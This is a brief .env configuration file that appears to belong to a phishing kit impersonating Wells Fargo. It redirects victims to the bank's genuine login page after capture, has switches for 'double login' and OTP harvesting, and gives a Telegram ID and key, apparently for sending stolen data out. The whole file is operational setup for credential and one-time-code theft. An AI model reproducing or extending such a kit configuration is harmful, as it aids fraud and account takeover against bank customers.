NEXT_PUBLIC_DOCS=OFF
NEXT_PUBLIC_EXIT_URL="https://connect.secure.wellsfargo.com/auth/login/present"
NEXT_PUBLIC_DOUBLE_LOGIN=OFF
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=OFF
NEXT_PUBLIC_OTP=ON
TELEGRAM=1860996067
KEY=15146704693026